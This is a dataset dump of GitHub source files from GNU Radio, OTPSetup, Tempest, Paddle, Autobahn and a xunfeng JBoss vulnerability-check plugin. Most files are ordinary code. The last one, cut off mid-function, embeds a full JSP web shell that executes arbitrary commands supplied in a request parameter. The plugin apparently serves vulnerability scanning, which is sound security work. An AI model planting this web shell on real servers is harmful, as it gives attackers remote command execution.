repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
MingdaZhou/gnuradio | grc/base/Connection.py | 17 | 5254 | """
Copyright 2008-2011 Free Software Foundation, Inc.
This file is part of GNU Radio
GNU Radio Companion is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
GNU Radio Companion is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
"""
from Element import Element
from . import odict
class Connection(Element):
def __init__(self, flow_graph, porta, portb):
"""
Make a new connection given the parent and 2 ports.
Args:
flow_graph: the parent of this element
porta: a port (any direction)
portb: a port (any direction)
@throws Error cannot make connection
Returns:
a new connection
"""
Element.__init__(self, flow_graph)
source = sink = None
#separate the source and sink
for port in (porta, portb):
if port.is_source(): source = port
if port.is_sink(): sink = port
if not source: raise ValueError('Connection could not isolate source')
if not sink: raise ValueError('Connection could not isolate sink')
busses = len(filter(lambda a: a.get_type() == 'bus', [source, sink]))%2
if not busses == 0: raise ValueError('busses must get with busses')
if not len(source.get_associated_ports()) == len(sink.get_associated_ports()):
raise ValueError('port connections must have same cardinality');
#ensure that this connection (source -> sink) is unique
for connection in self.get_parent().get_connections():
if connection.get_source() is source and connection.get_sink() is sink:
raise LookupError('This connection between source and sink is not unique.')
self._source = source
self._sink = sink
if source.get_type() == 'bus':
sources = source.get_associated_ports();
sinks = sink.get_associated_ports();
for i in range(len(sources)):
try:
flow_graph.connect(sources[i], sinks[i]);
except:
pass
def __str__(self):
return 'Connection (\n\t%s\n\t\t%s\n\t%s\n\t\t%s\n)'%(
self.get_source().get_parent(),
self.get_source(),
self.get_sink().get_parent(),
self.get_sink(),
)
def is_connection(self): return True
def validate(self):
"""
Validate the connections.
The ports must match in type.
"""
Element.validate(self)
platform = self.get_parent().get_parent()
source_domain = self.get_source().get_domain()
sink_domain = self.get_sink().get_domain()
if (source_domain, sink_domain) not in platform.get_connection_templates():
self.add_error_message('No connection known for domains "%s", "%s"'
% (source_domain, sink_domain))
too_many_other_sinks = (
source_domain in platform.get_domains() and
not platform.get_domain(key=source_domain)['multiple_sinks'] and
len(self.get_source().get_enabled_connections()) > 1
)
too_many_other_sources = (
sink_domain in platform.get_domains() and
not platform.get_domain(key=sink_domain)['multiple_sources'] and
len(self.get_sink().get_enabled_connections()) > 1
)
if too_many_other_sinks:
self.add_error_message(
'Domain "%s" can have only one downstream block' % source_domain)
if too_many_other_sources:
self.add_error_message(
'Domain "%s" can have only one upstream block' % sink_domain)
def get_enabled(self):
"""
Get the enabled state of this connection.
Returns:
true if source and sink blocks are enabled
"""
return self.get_source().get_parent().get_enabled() and \
self.get_sink().get_parent().get_enabled()
#############################
# Access Ports
#############################
def get_sink(self): return self._sink
def get_source(self): return self._source
##############################################
## Import/Export Methods
##############################################
def export_data(self):
"""
Export this connection's info.
Returns:
a nested data odict
"""
n = odict()
n['source_block_id'] = self.get_source().get_parent().get_id()
n['sink_block_id'] = self.get_sink().get_parent().get_id()
n['source_key'] = self.get_source().get_key()
n['sink_key'] = self.get_sink().get_key()
return n
| gpl-3.0 |
Genovo/OTPSetup | otpsetup/client/admin.py | 2 | 12559 | from boto import connect_s3, connect_ec2
from boto.s3.key import Key
from datetime import datetime
from django.conf import settings
from django.contrib import admin
from django.db import models
from django.forms import TextInput, Textarea
from kombu import Exchange
from models import InstanceRequest, AmazonMachineImage, GtfsFile, ManagedDeployment, DeploymentGroup, GraphBuild, GtfsBuildMapping, BuildHostMapping
from otpsetup.deploy_ops import deploy_once
import urllib2, sys, time
from otpsetup.client.lib.buttonable_model_admin import ButtonableModelAdmin
from otpsetup.client.models import InstanceRequest, GtfsFile, DeploymentHost
from otpsetup.shortcuts import render_to_response
from otpsetup.shortcuts import DjangoBrokerConnection
from otpsetup.shortcuts import check_for_running_instance
def accept_instance_request(modeladmin, request, queryset):
exchange = Exchange("amq.direct", type="direct", durable=True)
conn = DjangoBrokerConnection()
publisher = conn.Producer(routing_key="create_instance",
exchange=exchange)
for irequest in queryset:
if irequest.state != 'approved':
files = [gtfsfile.s3_key for gtfsfile in irequest.gtfsfile_set.all()]
extra_props = [gtfsfile.extra_properties for gtfsfile in irequest.gtfsfile_set.all()]
publisher.publish({"files": files, "extra_properties" : extra_props, "request_id" : irequest.id, "fare_factory" : irequest.fare_factory})
if hasattr(queryset, 'update'):
queryset.update(state='accepted', decision_date=datetime.now())
else:
for irequest in queryset:
irequest.state = "accepted"
irequest.decision_date = datetime.now()
irequest.save()
#launch a graph builder EC2 instance
check_for_running_instance(settings.GRAPH_BUILDER_AMI_ID)
accept_instance_request.short_description = "Send an instance request to the graph builder"
def reject_instance_request(modeladmin, request, queryset):
connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
bucket = connection.get_bucket(settings.S3_BUCKET)
for irequest in queryset:
if irequest.state != 'rejected':
for gtfs in irequest.gtfsfile_set.all():
key = Key(bucket)
key.key = gtfs.s3_key
key.delete()
if hasattr(queryset, 'update'):
queryset.update(state='rejected', decision_date=datetime.now())
else:
for irequest in queryset:
irequest.state = "rejected"
irequest.decision_date = datetime.now()
irequest.save()
reject_instance_request.short_description = "Reject an instance request"
def rebuild_instance_request(modeladmin, request, queryset):
exchange = Exchange("amq.direct", type="direct", durable=True)
conn = DjangoBrokerConnection()
publisher = conn.Producer(routing_key="rebuild_graph",
exchange=exchange)
for irequest in queryset:
publisher.publish({"request_id" : irequest.id, "data_key" : irequest.data_key})
if hasattr(queryset, 'update'):
queryset.update(state='accepted', decision_date=datetime.now())
else:
for irequest in queryset:
irequest.state = "accepted"
irequest.decision_date = datetime.now()
irequest.save()
#launch a graph builder EC2 instance
check_for_running_instance(settings.GRAPH_BUILDER_AMI_ID)
rebuild_instance_request.short_description = "Rebuild graph using archived configuration data"
class GtfsFileInline(admin.StackedInline):
model = GtfsFile
fields = ('s3_key', 'transload_url', 'validation_output_str', 'extra_properties')
readonly_fields = ('transload_url', 'validation_output', 'validation_output_str')
formfield_overrides = {
models.CharField: {'widget': TextInput(attrs={'size':118})},
models.TextField: {'widget': Textarea(attrs={'rows':4, 'cols':84})},
}
class InstanceRequestAdmin(ButtonableModelAdmin):
list_display = ('id', 'user', 'agency', 'submit_date', 'state', 'otp_version', 'deployment_host', 'email_link')
list_filter = ('state', 'submit_date')
actions = [accept_instance_request, reject_instance_request, rebuild_instance_request]
readonly_fields = ('user', 'state', 'submit_date', 'decision_date', 'ip', 'otp_version', 'graph_url', 'public_url', 'admin_password')
fields = ('submit_date', 'user', 'agency', 'comments', 'fare_factory', 'state', 'data_key', 'graph_key', 'public_url', 'graph_url', 'admin_password', 'otp_version', 'deployment_host')
inlines = [
GtfsFileInline,
]
def email_link(self, obj):
if(obj.graph_key == None or obj.public_url == None):
return "N/A"
graph_url = "https://s3.amazonaws.com/%s" % urllib2.quote(obj.graph_key)
html = "<script type=\"text/javascript\">"
html += "function open_email_window_%s() {" % obj.id
html += " myWindow=window.open('','','width=800,height=300');"
html += " myWindow.document.write('<div style=\"font-family:sans-serif; font-size:13px;\">');"
html += " myWindow.document.write('To: %s<br>');" % obj.user.email
html += " myWindow.document.write('Subject: Your OTP Deployer Request for %s<br><br>');" % obj.agency
html += " myWindow.document.write('This email is regarding the OTP Deployer request you submitted for \"%s\" on %s. ');" % (obj.agency, obj.submit_date.strftime("%B %d"))
html += " myWindow.document.write('The OTP instance has been deployed at:<br>%s<br><br>');" % obj.public_url
html += " myWindow.document.write('This instance will remain online for the following week. Please contact us if you would like to discuss longer-term hosting options.<br><br>');"
html += " myWindow.document.write('Additionally, the graph file can be downloaded directly at:<br>%s<br>');" % graph_url
html += " myWindow.document.write('The graph file was built with OTP version %s.<br><br>');" % obj.otp_version
html += " myWindow.document.write('If you need API access, visit http://deployer.opentripplanner.org/api_access for instructions. Your request ID is: <b>req-%s</b><br>');" % obj.id
html += " myWindow.document.write('The username / password for authenticated API calls is: admin / %s<br><br>');" % obj.admin_password
html += " myWindow.document.write('Thank you for your interest in OTP and please let me know if you have any questions.');"
html += " myWindow.document.write('</div>');"
html += " myWindow.focus();"
html += "}"
html += "</script>"
html += "<a href='javascript:open_email_window_%s()'>Email Text</a>" % obj.id
return html
email_link.short_description = "email link"
email_link.allow_tags = True
formfield_overrides = {
models.CharField: {'widget': TextInput(attrs={'size':118})}
}
def approve_or_reject_buttons(self, request=None, object_id=None):
if request is None:
return [self.approve, self.reject]
irequest = InstanceRequest.objects.get(id=object_id)
if irequest.state == "submitted":
return [self.approve, self.reject]
if irequest.state == "rejected":
#you can actually approve a rejected request, and it will go through (I hope)
return [self.approve]
elif irequest.state != "running":
#you can preemptively reject something, too
return [self.reject]
buttons = approve_or_reject_buttons
def approve(self, irequest):
accept_instance_request(None, None, [irequest])
approve.short_description = "Approve"
def reject(self, irequest):
reject_instance_request(None, None, [irequest])
reject.short_description = "Reject"
admin.site.register(InstanceRequest, InstanceRequestAdmin)
class AmazonMachineImageAdmin(admin.ModelAdmin):
list_display = ('machine_type', 'version', 'ami_id', 'default_for_new_instances')
admin.site.register(AmazonMachineImage, AmazonMachineImageAdmin)
class BuildHostMappingInline(admin.TabularInline):
model=BuildHostMapping
readonly_fields = ('graph_build','deployment_host')
extra=0
def launch_deployment_host(modeladmin, request, queryset):
exchange = Exchange("amq.direct", type="direct", durable=True)
conn = DjangoBrokerConnection()
publisher = conn.Producer(routing_key="launch_multideployer", exchange=exchange)
ec2_conn = connect_ec2(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
for dephost in queryset:
# publish launch_multideployer message
publisher.publish({"request_id" : dephost.id})
dephost.instance_id = "launching...";
if dephost.name is None or dephost.name == '':
dephost.name = 'dephost_%s' % dephost.id
dephost.save()
# create new instance to receive message
image = ec2_conn.get_image(settings.MULTIDEPLOYER_AMI_ID)
reservation = image.run(subnet_id=settings.VPC_SUBNET_ID, placement='us-east-1b', key_name='otp-dev', instance_type='m2.xlarge')
time.sleep(5)
for instance in reservation.instances:
instance.add_tag("Name", dephost.name)
launch_deployment_host.short_description = "Launch deployment host instance on AWS"
def update_memory(modeladmin, request, queryset):
for dephost in queryset:
try:
response = urllib2.urlopen('http://%s:8080/memcheck/total' % dephost.host_ip)
dephost.total_memory = int(response.read().strip())
response = urllib2.urlopen('http://%s:8080/memcheck/free' % dephost.host_ip)
dephost.free_memory = int(response.read().strip())
dephost.save()
except:
sys.stderr.write("warning: memory utilization for deployment host % could not be accessed" % dephost.id)
class DeploymentHostAdmin(admin.ModelAdmin):
list_display = ('id', 'group', 'name', 'instance_id', 'host_ip', 'otp_version', 'total_memory', 'free_memory')
readonly_fields = ('instance_id', 'host_ip', 'auth_password', 'total_memory', 'free_memory')
actions = [launch_deployment_host, update_memory]
inlines = [
BuildHostMappingInline
]
admin.site.register(DeploymentHost, DeploymentHostAdmin)
class DeploymentGroupAdmin(admin.ModelAdmin):
list_display = ('id', 'name')
admin.site.register(DeploymentGroup, DeploymentGroupAdmin)
class GtfsBuildMappingInline(admin.TabularInline):
model=GtfsBuildMapping
readonly_fields = ( 'gtfs_feed', 'graph_build')
extra=0
# GraphBuild
def update_graph_size(modeladmin, request, queryset):
for build in queryset:
if build.success and not build.graph_key is None:
connection = connect_s3(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_KEY)
bucket = connection.get_bucket(settings.GRAPH_S3_BUCKET)
key = bucket.lookup(build.graph_key)
build.graph_size = int(key.size)
build.save()
def deploy_managed_graph(modeladmin, request, queryset):
for build in queryset:
if build.success and not build.graph_key is None:
deploy_once(build)
class GraphBuildAdmin(ButtonableModelAdmin):
list_display = ('id', 'deployment', 'success', 'gtfs_count', 'creation_date', 'completion_date', 'graph_size', 'otp_version', 'host_count')
readonly_fields = ('deployment', 'success', 'creation_date', 'completion_date', 'otp_version')
inlines = [
GtfsBuildMappingInline, BuildHostMappingInline
]
actions = [update_graph_size, deploy_managed_graph]
def redeploy(self, request):
self.message_user(request, "redeployed")
redeploy.short_description = "Redeploy"
buttons = [redeploy]
admin.site.register(GraphBuild, GraphBuildAdmin)
class GraphBuildInline(admin.TabularInline):
readonly_fields =('link', 'success', 'gtfs_count', 'creation_date','completion_date','graph_size', 'otp_version', 'host_count')
exclude = ('osm_key','graph_key', 'output_key', 'config')
model = GraphBuild
extra = 0
# ManagedDeployment
class ManagedDeploymentAdmin(admin.ModelAdmin):
list_display = ('id', 'group', 'source', 'description')
list_filter = ('group',)
inlines = [
GraphBuildInline,
]
admin.site.register(ManagedDeployment, ManagedDeploymentAdmin)
| gpl-3.0 |
hayderimran7/tempest | tempest/api/network/test_metering_extensions.py | 17 | 6784 | # Copyright (C) 2014 eNovance SAS <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from tempest.api.network import base
from tempest.common.utils import data_utils
from tempest import test
LOG = logging.getLogger(__name__)
class MeteringTestJSON(base.BaseAdminNetworkTest):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
List, Show, Create, Delete Metering labels
List, Show, Create, Delete Metering labels rules
"""
@classmethod
def skip_checks(cls):
super(MeteringTestJSON, cls).skip_checks()
if not test.is_extension_enabled('metering', 'network'):
msg = "metering extension not enabled."
raise cls.skipException(msg)
@classmethod
def resource_setup(cls):
super(MeteringTestJSON, cls).resource_setup()
description = "metering label created by tempest"
name = data_utils.rand_name("metering-label")
cls.metering_label = cls.create_metering_label(name, description)
remote_ip_prefix = ("10.0.0.0/24" if cls._ip_version == 4
else "fd02::/64")
direction = "ingress"
cls.metering_label_rule = cls.create_metering_label_rule(
remote_ip_prefix, direction,
metering_label_id=cls.metering_label['id'])
def _delete_metering_label(self, metering_label_id):
# Deletes a label and verifies if it is deleted or not
self.admin_client.delete_metering_label(metering_label_id)
# Asserting that the label is not found in list after deletion
labels = self.admin_client.list_metering_labels(id=metering_label_id)
self.assertEqual(len(labels['metering_labels']), 0)
def _delete_metering_label_rule(self, metering_label_rule_id):
# Deletes a rule and verifies if it is deleted or not
self.admin_client.delete_metering_label_rule(
metering_label_rule_id)
# Asserting that the rule is not found in list after deletion
rules = (self.admin_client.list_metering_label_rules(
id=metering_label_rule_id))
self.assertEqual(len(rules['metering_label_rules']), 0)
@test.idempotent_id('e2fb2f8c-45bf-429a-9f17-171c70444612')
def test_list_metering_labels(self):
# Verify label filtering
body = self.admin_client.list_metering_labels(id=33)
metering_labels = body['metering_labels']
self.assertEqual(0, len(metering_labels))
@test.idempotent_id('ec8e15ff-95d0-433b-b8a6-b466bddb1e50')
def test_create_delete_metering_label_with_filters(self):
# Creates a label
name = data_utils.rand_name('metering-label-')
description = "label created by tempest"
body = self.admin_client.create_metering_label(name=name,
description=description)
metering_label = body['metering_label']
self.addCleanup(self._delete_metering_label,
metering_label['id'])
# Assert whether created labels are found in labels list or fail
# if created labels are not found in labels list
labels = (self.admin_client.list_metering_labels(
id=metering_label['id']))
self.assertEqual(len(labels['metering_labels']), 1)
@test.idempotent_id('30abb445-0eea-472e-bd02-8649f54a5968')
def test_show_metering_label(self):
# Verifies the details of a label
body = self.admin_client.show_metering_label(self.metering_label['id'])
metering_label = body['metering_label']
self.assertEqual(self.metering_label['id'], metering_label['id'])
self.assertEqual(self.metering_label['tenant_id'],
metering_label['tenant_id'])
self.assertEqual(self.metering_label['name'], metering_label['name'])
self.assertEqual(self.metering_label['description'],
metering_label['description'])
@test.idempotent_id('cc832399-6681-493b-9d79-0202831a1281')
def test_list_metering_label_rules(self):
# Verify rule filtering
body = self.admin_client.list_metering_label_rules(id=33)
metering_label_rules = body['metering_label_rules']
self.assertEqual(0, len(metering_label_rules))
@test.idempotent_id('f4d547cd-3aee-408f-bf36-454f8825e045')
def test_create_delete_metering_label_rule_with_filters(self):
# Creates a rule
remote_ip_prefix = ("10.0.1.0/24" if self._ip_version == 4
else "fd03::/64")
body = (self.admin_client.create_metering_label_rule(
remote_ip_prefix=remote_ip_prefix,
direction="ingress",
metering_label_id=self.metering_label['id']))
metering_label_rule = body['metering_label_rule']
self.addCleanup(self._delete_metering_label_rule,
metering_label_rule['id'])
# Assert whether created rules are found in rules list or fail
# if created rules are not found in rules list
rules = (self.admin_client.list_metering_label_rules(
id=metering_label_rule['id']))
self.assertEqual(len(rules['metering_label_rules']), 1)
@test.idempotent_id('b7354489-96ea-41f3-9452-bace120fb4a7')
def test_show_metering_label_rule(self):
# Verifies the details of a rule
body = (self.admin_client.show_metering_label_rule(
self.metering_label_rule['id']))
metering_label_rule = body['metering_label_rule']
self.assertEqual(self.metering_label_rule['id'],
metering_label_rule['id'])
self.assertEqual(self.metering_label_rule['remote_ip_prefix'],
metering_label_rule['remote_ip_prefix'])
self.assertEqual(self.metering_label_rule['direction'],
metering_label_rule['direction'])
self.assertEqual(self.metering_label_rule['metering_label_id'],
metering_label_rule['metering_label_id'])
self.assertFalse(metering_label_rule['excluded'])
class MeteringIpV6TestJSON(MeteringTestJSON):
_ip_version = 6
| apache-2.0 |
baidu/Paddle | python/paddle/fluid/contrib/tests/test_calibration.py | 1 | 11778 | # copyright (c) 2018 paddlepaddle authors. all rights reserved.
#
# licensed under the apache license, version 2.0 (the "license");
# you may not use this file except in compliance with the license.
# you may obtain a copy of the license at
#
# http://www.apache.org/licenses/license-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the license is distributed on an "as is" basis,
# without warranties or conditions of any kind, either express or implied.
# see the license for the specific language governing permissions and
# limitations under the license.
import unittest
import os
import numpy as np
import time
import sys
import random
import paddle
import paddle.fluid as fluid
import functools
import contextlib
from paddle.dataset.common import download
from PIL import Image, ImageEnhance
import math
import paddle.fluid.contrib.int8_inference.utility as int8_utility
random.seed(0)
np.random.seed(0)
DATA_DIM = 224
THREAD = 1
BUF_SIZE = 102400
DATA_DIR = 'data/ILSVRC2012'
img_mean = np.array([0.485, 0.456, 0.406]).reshape((3, 1, 1))
img_std = np.array([0.229, 0.224, 0.225]).reshape((3, 1, 1))
# TODO(guomingz): Remove duplicated code from resize_short, crop_image, process_image, _reader_creator
def resize_short(img, target_size):
percent = float(target_size) / min(img.size[0], img.size[1])
resized_width = int(round(img.size[0] * percent))
resized_height = int(round(img.size[1] * percent))
img = img.resize((resized_width, resized_height), Image.LANCZOS)
return img
def crop_image(img, target_size, center):
width, height = img.size
size = target_size
if center == True:
w_start = (width - size) / 2
h_start = (height - size) / 2
else:
w_start = np.random.randint(0, width - size + 1)
h_start = np.random.randint(0, height - size + 1)
w_end = w_start + size
h_end = h_start + size
img = img.crop((w_start, h_start, w_end, h_end))
return img
def process_image(sample, mode, color_jitter, rotate):
img_path = sample[0]
img = Image.open(img_path)
img = resize_short(img, target_size=256)
img = crop_image(img, target_size=DATA_DIM, center=True)
if img.mode != 'RGB':
img = img.convert('RGB')
img = np.array(img).astype('float32').transpose((2, 0, 1)) / 255
img -= img_mean
img /= img_std
return img, sample[1]
def _reader_creator(file_list,
mode,
shuffle=False,
color_jitter=False,
rotate=False,
data_dir=DATA_DIR):
def reader():
with open(file_list) as flist:
full_lines = [line.strip() for line in flist]
if shuffle:
np.random.shuffle(full_lines)
lines = full_lines
for line in lines:
img_path, label = line.split()
img_path = os.path.join(data_dir, img_path)
if not os.path.exists(img_path):
continue
yield img_path, int(label)
mapper = functools.partial(
process_image, mode=mode, color_jitter=color_jitter, rotate=rotate)
return paddle.reader.xmap_readers(mapper, reader, THREAD, BUF_SIZE)
def val(data_dir=DATA_DIR):
file_list = os.path.join(data_dir, 'val_list.txt')
return _reader_creator(file_list, 'val', shuffle=False, data_dir=data_dir)
class TestCalibrationForResnet50(unittest.TestCase):
def setUp(self):
self.int8_download = 'int8/download'
self.cache_folder = os.path.expanduser('~/.cache/paddle/dataset/' +
self.int8_download)
data_urls = []
data_md5s = []
self.data_cache_folder = ''
if os.environ.get('DATASET') == 'full':
data_urls.append(
'https://paddle-inference-dist.bj.bcebos.com/int8/ILSVRC2012_img_val.tar.gz.partaa'
)
data_md5s.append('60f6525b0e1d127f345641d75d41f0a8')
data_urls.append(
'https://paddle-inference-dist.bj.bcebos.com/int8/ILSVRC2012_img_val.tar.gz.partab'
)
data_md5s.append('1e9f15f64e015e58d6f9ec3210ed18b5')
self.data_cache_folder = self.download_data(data_urls, data_md5s,
"full_data", False)
else:
data_urls.append(
'http://paddle-inference-dist.bj.bcebos.com/int8/calibration_test_data.tar.gz'
)
data_md5s.append('1b6c1c434172cca1bf9ba1e4d7a3157d')
self.data_cache_folder = self.download_data(data_urls, data_md5s,
"small_data", False)
# reader/decorator.py requires the relative path to the data folder
cmd = 'rm -rf {0} && ln -s {1} {0}'.format("data",
self.data_cache_folder)
os.system(cmd)
self.batch_size = 1
self.sample_iterations = 50
self.infer_iterations = 50000 if os.environ.get(
'DATASET') == 'full' else 50
def cache_unzipping(self, target_folder, zip_path):
if not os.path.exists(target_folder):
cmd = 'mkdir {0} && tar xf {1} -C {0}'.format(target_folder,
zip_path)
os.system(cmd)
def download_data(self, data_urls, data_md5s, folder_name, is_model=True):
data_cache_folder = os.path.join(self.cache_folder, folder_name)
zip_path = ''
if os.environ.get('DATASET') == 'full':
file_names = []
for i in range(0, len(data_urls)):
download(data_urls[i], self.int8_download, data_md5s[i])
file_names.append(data_urls[i].split('/')[-1])
zip_path = os.path.join(self.cache_folder,
'full_imagenet_val.tar.gz')
if not os.path.exists(zip_path):
cat_command = 'cat'
for file_name in file_names:
cat_command += ' ' + os.path.join(self.cache_folder,
file_name)
cat_command += ' > ' + zip_path
os.system(cat_command)
if os.environ.get('DATASET') != 'full' or is_model:
download(data_urls[0], self.int8_download, data_md5s[0])
file_name = data_urls[0].split('/')[-1]
zip_path = os.path.join(self.cache_folder, file_name)
print('Data is downloaded at {0}').format(zip_path)
self.cache_unzipping(data_cache_folder, zip_path)
return data_cache_folder
def download_model(self):
# resnet50 fp32 data
data_urls = [
'http://paddle-inference-dist.bj.bcebos.com/int8/resnet50_int8_model.tar.gz'
]
data_md5s = ['4a5194524823d9b76da6e738e1367881']
self.model_cache_folder = self.download_data(data_urls, data_md5s,
"resnet50_fp32")
self.model = "ResNet-50"
self.algo = "direct"
def run_program(self, model_path, generate_int8=False, algo='direct'):
image_shape = [3, 224, 224]
fluid.memory_optimize(fluid.default_main_program())
exe = fluid.Executor(fluid.CPUPlace())
[infer_program, feed_dict,
fetch_targets] = fluid.io.load_inference_model(model_path, exe)
t = fluid.transpiler.InferenceTranspiler()
t.transpile(infer_program, fluid.CPUPlace())
val_reader = paddle.batch(val(), self.batch_size)
iterations = self.infer_iterations
if generate_int8:
int8_model = os.path.join(os.getcwd(), "calibration_out")
iterations = self.sample_iterations
if os.path.exists(int8_model):
os.system("rm -rf " + int8_model)
os.system("mkdir " + int8_model)
calibrator = int8_utility.Calibrator(
program=infer_program,
pretrained_model=model_path,
algo=algo,
exe=exe,
output=int8_model,
feed_var_names=feed_dict,
fetch_list=fetch_targets)
test_info = []
cnt = 0
periods = []
for batch_id, data in enumerate(val_reader()):
image = np.array(
[x[0].reshape(image_shape) for x in data]).astype("float32")
label = np.array([x[1] for x in data]).astype("int64")
label = label.reshape([-1, 1])
running_program = calibrator.sampling_program.clone(
) if generate_int8 else infer_program.clone()
t1 = time.time()
_, acc1, _ = exe.run(
running_program,
feed={feed_dict[0]: image,
feed_dict[1]: label},
fetch_list=fetch_targets)
t2 = time.time()
period = t2 - t1
periods.append(period)
if generate_int8:
calibrator.sample_data()
test_info.append(np.mean(acc1) * len(data))
cnt += len(data)
if (batch_id + 1) % 100 == 0:
print("{0} images,".format(batch_id + 1))
sys.stdout.flush()
if (batch_id + 1) == iterations:
break
if generate_int8:
calibrator.save_int8_model()
print(
"Calibration is done and the corresponding files are generated at {}".
format(os.path.abspath("calibration_out")))
else:
throughput = cnt / np.sum(periods)
latency = np.average(periods)
acc1 = np.sum(test_info) / cnt
return (throughput, latency, acc1)
def test_calibration(self):
self.download_model()
print("Start FP32 inference for {0} on {1} images ...").format(
self.model, self.infer_iterations)
(fp32_throughput, fp32_latency,
fp32_acc1) = self.run_program(self.model_cache_folder + "/model")
print("Start INT8 calibration for {0} on {1} images ...").format(
self.model, self.sample_iterations)
self.run_program(
self.model_cache_folder + "/model", True, algo=self.algo)
print("Start INT8 inference for {0} on {1} images ...").format(
self.model, self.infer_iterations)
(int8_throughput, int8_latency,
int8_acc1) = self.run_program("calibration_out")
delta_value = fp32_acc1 - int8_acc1
self.assertLess(delta_value, 0.01)
print(
"FP32 {0}: batch_size {1}, throughput {2} images/second, latency {3} second, accuracy {4}".
format(self.model, self.batch_size, fp32_throughput, fp32_latency,
fp32_acc1))
print(
"INT8 {0}: batch_size {1}, throughput {2} images/second, latency {3} second, accuracy {4}".
format(self.model, self.batch_size, int8_throughput, int8_latency,
int8_acc1))
sys.stdout.flush()
class TestCalibrationForMobilenetv1(TestCalibrationForResnet50):
def download_model(self):
# mobilenetv1 fp32 data
data_urls = [
'http://paddle-inference-dist.bj.bcebos.com/int8/mobilenetv1_int8_model.tar.gz'
]
data_md5s = ['13892b0716d26443a8cdea15b3c6438b']
self.model_cache_folder = self.download_data(data_urls, data_md5s,
"mobilenetv1_fp32")
self.model = "MobileNet-V1"
self.algo = "KL"
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
D3f0/AutobahnPython | autobahn/autobahn/compress.py | 12 | 2860 | ###############################################################################
##
## Copyright 2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
__all__ = ["PerMessageCompressOffer",
"PerMessageCompressOfferAccept",
"PerMessageCompressResponse",
"PerMessageCompressResponseAccept",
"PerMessageCompress",
"PerMessageDeflateOffer",
"PerMessageDeflateOfferAccept",
"PerMessageDeflateResponse",
"PerMessageDeflateResponseAccept",
"PerMessageDeflate",
"PerMessageBzip2Offer",
"PerMessageBzip2OfferAccept",
"PerMessageBzip2Response",
"PerMessageBzip2ResponseAccept",
"PerMessageBzip2",
"PERMESSAGE_COMPRESSION_EXTENSION"
]
from compress_base import *
from compress_deflate import *
from compress_bzip2 import *
## class for "permessage-deflate" and "permessage-bzip2" are always available
##
PERMESSAGE_COMPRESSION_EXTENSION = {
PerMessageDeflateMixin.EXTENSION_NAME: {
'Offer': PerMessageDeflateOffer,
'OfferAccept': PerMessageDeflateOfferAccept,
'Response': PerMessageDeflateResponse,
'ResponseAccept': PerMessageDeflateResponseAccept,
'PMCE': PerMessageDeflate},
PerMessageBzip2Mixin.EXTENSION_NAME: {
'Offer': PerMessageBzip2Offer,
'OfferAccept': PerMessageBzip2OfferAccept,
'Response': PerMessageBzip2Response,
'ResponseAccept': PerMessageBzip2ResponseAccept,
'PMCE': PerMessageBzip2}
}
## include "permessage-snappy" classes if Snappy is available
##
try:
import snappy
from compress_snappy import *
PMCE = {
'Offer': PerMessageSnappyOffer,
'OfferAccept': PerMessageSnappyOfferAccept,
'Response': PerMessageSnappyResponse,
'ResponseAccept': PerMessageSnappyResponseAccept,
'PMCE': PerMessageSnappy
}
PERMESSAGE_COMPRESSION_EXTENSION[PerMessageSnappyMixin.EXTENSION_NAME] = PMCE
__all__.extend(["PerMessageSnappyOffer",
"PerMessageSnappyOfferAccept",
"PerMessageSnappyResponse",
"PerMessageSnappyResponseAccept",
"PerMessageSnappy"])
except ImportError:
pass
| apache-2.0 |
superhuahua/xunfengES | celerynode/vuldb/jboss_head.py | 2 | 2482 | # coding:utf-8
# author:wolf
import urllib2
import socket
import time
import random
def get_plugin_info():
plugin_info = {
"name": "Jboss 认证绕过",
"info": "通过Head请求可绕过Jboos的登陆认证,攻击者可通过此漏洞直接获取服务器权限。",
"level": "高危",
"type": "认证绕过",
"author": "wolf@YSRC",
"url": "https://access.redhat.com/solutions/30744",
"keyword": "tag:jboss",
"source": 1
}
return plugin_info
def random_str(len):
str1 = ""
for i in range(len):
str1 += (random.choice("ABCDEFGH"))
return str1
def check(host, port, timeout):
try:
socket.setdefaulttimeout(timeout)
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((host, int(port)))
shell = """<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>"""
# s1.recv(1024)
shellcode = ""
